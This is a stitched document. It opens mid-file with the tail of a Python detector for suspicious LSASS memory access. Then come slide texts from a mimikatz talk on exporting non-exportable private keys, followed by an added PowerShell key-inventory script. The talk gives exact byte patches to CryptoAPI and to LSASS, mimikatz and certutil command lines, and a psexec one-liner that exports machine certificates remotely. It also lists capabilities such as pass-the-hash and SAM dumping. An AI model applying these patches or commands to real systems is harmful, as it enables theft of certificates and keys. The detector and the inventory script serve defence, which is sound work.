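    "EventID=1 Image=C:\\Windows\\System32\\cmd.exe",
]

_FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """key=value line -> dict (paths with spaces are out of scope for this format)."""
    return dict(_FIELD.findall(line))


def classify(event: dict):
    """Return a verdict string for a suspicious LSASS access, else None."""
    if event.get("EventID") != "10":
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    src = event.get("SourceImage", "").lower()
    access = int(event.get("GrantedAccess", "0"), 16)
    if access & INJECT_MASK == INJECT_MASK:
        # write + thread rights on LSASS are never needed by benign software
        return "lsass-injection-capable"
    if access & READ_MASK and src not in ALLOWLIST:
        # read-only access is what the injection-free sekurlsa module needs
        return "lsass-memory-read"
    return None


def detect(lines):
    """Run classify() over raw lines; return (verdict, source image, access)."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        verdict = classify(ev)
        if verdict:
            findings.append((verdict, ev["SourceImage"], ev["GrantedAccess"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding)
```

The 0x1410 and 0x143a masks in the samples are constructed to match the two patterns (query information plus read, and the same plus write, VM operation and thread creation). The allowlist only applies to the read-only verdict: a handle with injection rights on LSASS is flagged regardless of who opened it.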
mimikatz :: crypto :: what is it ? (mod_mimikatz_crypto)

A little module that I wrote to :
– play with Windows Cryptographic API / CNG and RSA keys
– automate the export of certificates/keys
  • even those which are “not” exportable

What the crypto module can do :
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public in DER format
    – with private keys in PFX format
  • Private keys in PVK format
    – it’s cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again !)
mimikatz :: crypto :: how it’s protected

Private keys are DPAPI protected
– you cannot reuse private key files on another computer
  • at least not without the master keys and/or the users’ passwords

Computer/User can load their own keys because they have enough secrets to do it (ex : session opened)
– yes, a computer/server opens a “session”

Export/Usage can be limited by :
– Password
– Popup
  (a constraint for most users ; unavailable for computer keys)
– Export/Archive flag not present

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works

“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …

Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it’s exported (PLAYSKOOL level)

(diagram) Process → CryptoAPI and RSA CSP : load private key (DPAPI decode) → ask to export key → Exportable ? → yes : exported key / no : NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export, and checks if the key is exportable

  mimikatz # crypto::exportCertificates
  Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
   - Benjamin Delpy
          Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03}
          Provider      : Microsoft Enhanced Cryptographic Provider v1.0
          Type          : AT_KEYEXCHANGE
          Exportabilité : NON                                    (callout : Exportable ?)
          Taille clé    : 2048
          Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
          Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificat 0 ================
  Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
  Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Objet: CN=Benjamin Delpy, C=FR
  Il ne s'agit pas d'un certificat racine
  Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}
    Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
  La clé privée NE PEUT PAS être exportée
  Succès du test de cryptage
  CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
  CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi :: because I own my process

So what ? A module in my own process returns that I can’t do something ?
CryptoAPI is in my memory space, let’s patch it !

I wrote “4” bytes in my memory space

  before :
  .text:0AC0B7CB  0F 85 33 C7 FF FF   jnz  continue_key_export_or_archive
  after :
  .text:0AC0B7CB  90                  nop
  .text:0AC0B7CC  E9 33 C7 FF FF      jmp  continue_key_export_or_archive

  before :
  .text:0AC1F749  0F 85 B6 3B FF FF   jnz  continue_key_export_or_archive_prepare
  after :
  .text:0AC1F749  90                  nop
  .text:0AC1F74A  E9 B6 3B FF FF      jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time !
Import, export, import as not exportable…. export
mimikatz :: crypto :: patchcapi :: limitations

Because :
– I’m lazy
– I’ve seen RSA keys in the majority of real-life cases
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with :
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”

This time, key operations are not made in the “user” process context
Processes use RPC to call “Key Isolation service” (keyiso) functions

It seems more secure than CryptoAPI…
– it is, but it’s not perfect…
mimikatz :: crypto :: cng :: how it’s exported (PLAYSKOOL level)

(diagram) Process → CNG → RPC → KeyIso service (LSASS process ; NT6 system protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) : load private key (DPAPI decode) → ask to export key → Exportable ? → yes : exported key / no : NTE_NOT_SUPPORTED
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) : ncrypt!SPCryptExportKey
This function does all the work to prepare the export, and checks if the key is exportable

  mimikatz # crypto::exportKeys [user]
  Clés CNG :
   - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
          Exportabilité : NON                                    (callout : Exportable ?)
          Taille clé    : 2048
          Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
          mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng – because sometimes I own LSASS
This time, checks and keys are in the LSASS process…
And what ?
I wrote “1” byte in LSASS memory space…
Before:
.text:6C815210 75 1C    jnz short continue_key_export
After (one byte changed, 75 → EB):
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng – demo time !
Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng – limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with :
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh ?)
– certutil can…
mimikatz :: crypto :: patchcng – bonus
After one admin has patched LSASS, all users of the current system benefit from extra exports
– until reboot / KeyIso service restart
Some other programs that don’t check the export flag before asking for export can work too
– Yeah, like the good old one : certutil
Before crypto::patchcng :
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After crypto::patchcng :
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto – memo
Some commands :
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password :
– PFX files are protected by this password : mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn’t it ?
• So yes, mimikatz can export it
mimikatz :: crypto – what can we do ?
Exactly the same as for sekurlsa : it comes down to preventing access to accounts / the computer !
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors’ implementation (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
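As an added example for the export flow and the smartcard / HSM / TPM advice above, not part of the talk or of mimikatz: a PowerShell inventory of which provider holds each certificate’s private key and whether that provider flags it exportable, so keys living in a software KSP/CSP (the only ones whose protection is that flag checked inside LSASS) can be found and moved to hardware. The store path default and the provider-name matching are assumptions of this example.

```powershell
# Added example (not from the talk, not mimikatz code): list the private keys
# behind the certificates in a store, which provider holds each one and whether
# that provider reports it exportable. Keys in the Microsoft Software Key
# Storage Provider or a software CSP are the candidates to migrate to a smart
# card, TPM or HSM. Default store path and name matching are assumptions.
function Get-PrivateKeyStorageReport {
    param([string]$StorePath = 'Cert:\CurrentUser\My')   # assumed default
    $rsaExt = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]
    foreach ($cert in Get-ChildItem -Path $StorePath | Where-Object { $_.HasPrivateKey }) {
        $row = [ordered]@{
            Subject    = $cert.Subject
            Thumbprint = $cert.Thumbprint
            KeyType    = 'unknown'     # 'CNG' (KSP) or 'CAPI' (legacy CSP)
            Provider   = ''
            Exportable = $null         # the flag exactly as the provider reports it
            Note       = ''
        }
        try {
            $rsa = $rsaExt::GetRSAPrivateKey($cert)   # $null for non-RSA keys
            if ($rsa -is [System.Security.Cryptography.RSACng]) {
                $key = $rsa.Key                        # CngKey opened through the KSP
                $row.KeyType    = 'CNG'
                $row.Provider   = $key.Provider.Provider
                $row.Exportable = $key.ExportPolicy.HasFlag(
                    [System.Security.Cryptography.CngExportPolicies]::AllowExport)
            } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                $info = $rsa.CspKeyContainerInfo       # legacy CryptoAPI container
                $row.KeyType    = 'CAPI'
                $row.Provider   = $info.ProviderName
                $row.Exportable = $info.Exportable
            } else {
                $row.Note = 'non-RSA key, not inspected'
            }
        } catch {
            # e.g. smart card key with no card inserted, or a key this user cannot open
            $row.Note = $_.Exception.Message
        }
        # Software providers keep the key on disk under DPAPI; the exportability
        # flag is their only guard. Hardware providers keep the material off-box.
        if ($row.Provider -like 'Microsoft Software*' -or
            $row.Provider -like 'Microsoft *Cryptographic Provider*') {
            $row.Note = ('software-stored key; ' + $row.Note).TrimEnd('; ')
        }
        [pscustomobject]$row
    }
}

Get-PrivateKeyStorageReport | Format-Table -AutoSize
```

Run it as the user whose store is inspected; certutil -user -key lists the key containers themselves, which is how to spot the orphaned keys the memo slide mentions (a deleted certificate leaves its private key behind).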
mimikatz – what else can it do ?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process / thread / image / registry)
– List Objects hooks and procedures
– …
…
mimikatz – that’s all folks !
Thanks to / Merci à :
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
• Partners and Sponsors for sure !
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention !
Questions ?
Don’t be shy ;) especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog     http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source   https://code.google.com/p/mimikatz/
email    benjamin@gentilkiwi.com